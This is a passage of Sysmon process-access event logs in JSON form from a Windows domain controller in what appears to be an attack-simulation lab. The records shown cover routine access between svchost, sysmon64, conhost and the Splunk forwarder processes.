C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.822","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2956,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.822\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.822","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2957,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.822\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.822","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2958,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.822\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.822","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2959,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.822\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.822","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2960,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.822\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.822","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2961,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.822\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.822","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2962,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.822\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-001021090500}\r\nTargetProcessId: 1436\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.822","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-001021090500}","TargetProcessId":"1436","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:39","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2963,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:39.057\r\nSourceProcessGUID: {A837DB8D-0236-5F25-0000-001021090500}\r\nSourceProcessId: 1436\r\nSourceThreadId: 1608\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:39.057","SourceProcessGUID":"{A837DB8D-0236-5F25-0000-001021090500}","SourceProcessId":"1436","SourceThreadId":"1608","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program 